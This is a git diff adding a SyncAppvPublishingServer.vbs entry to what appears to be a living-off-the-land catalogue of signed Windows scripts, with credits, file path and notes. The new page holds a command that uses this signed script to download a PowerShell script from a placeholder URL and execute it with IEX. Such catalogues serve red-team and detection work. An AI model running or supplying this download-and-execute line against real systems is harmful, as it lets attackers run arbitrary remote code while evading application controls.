diff --git a/LOLScripts.md b/LOLScripts.md index 4366a8c..0f67e1d 100644 --- a/LOLScripts.md +++ b/LOLScripts.md @@ -7,6 +7,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge [Cl_invocation.ps1](OSScripts/Cl_invocation.md) [Manage-bde.vbs](OSScripts/Manage-bde.md) -[Slmgr.vbs](OSScripts/Slmgr.md) [Pubprn.vbs](OSScripts/Pubprn.md) +[Slmgr.vbs](OSScripts/Slmgr.md) +[Syncappvpublishingserver.vbs(OSScripts/Syncappvpublishingserver.vbs) [Winrm.vbs](OSScripts/Winrm.md) diff --git a/OSScripts/Syncappvpublishingserver.md b/OSScripts/Syncappvpublishingserver.md new file mode 100644 index 0000000..5be4b2c --- /dev/null +++ b/OSScripts/Syncappvpublishingserver.md @@ -0,0 +1,28 @@ +## SyncAppvPublishingServer.vbs + +* Functions: Execute + +``` +SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" +``` + +Acknowledgements: +* Nick Landers - @monoxgas +* Casey Smith - @subTee + +Code sample: + +Resources: +* https://twitter.com/monoxgas/status/895045566090010624 +* https://twitter.com/subTee/status/855738126882316288 + +Full path: +``` +C:\Windows\System32\SyncAppvPublishingServer.vbs +``` + +Notes: +Just like [SyncAppvPublishingServer.exe](OSBinaries/Syncappvpublishingserver.md) this starts a Powershell script with the provided arguments. + +Included with Windows 10 Enterprise. Script is catalog signed by Microsoft. +